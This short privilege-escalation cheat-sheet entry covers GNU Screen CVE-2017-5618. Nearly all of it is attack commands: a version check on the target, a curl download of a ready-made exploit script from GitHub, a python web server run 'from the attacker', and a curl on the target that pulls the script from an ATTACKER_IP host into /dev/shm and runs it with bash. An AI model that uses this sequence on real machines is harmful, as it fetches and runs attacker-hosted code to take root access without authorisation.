PRIMARY CATEGORY → LINUX PRIVESC
GNU Screen
CVE-2017-5618
Affected Versions
4.5.1 and lower ( 4.05.00 == 4.5.0 )
From the Target 🎯
screen -vSetup
- Downloading the Script
From the Attacker ⚔️
curl --silent --location --request GET 'https://github.com/YasserREED/screen-v4.5.0-priv-escalate/raw/refs/heads/main/full-exploit.sh' --output exploit.bash- Transferring the file to the Target
From the Attacker ⚔️
python -m http.server 80From the Target🎯
cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/exploit.bash' --remote-nameUsage
bash exploit.bash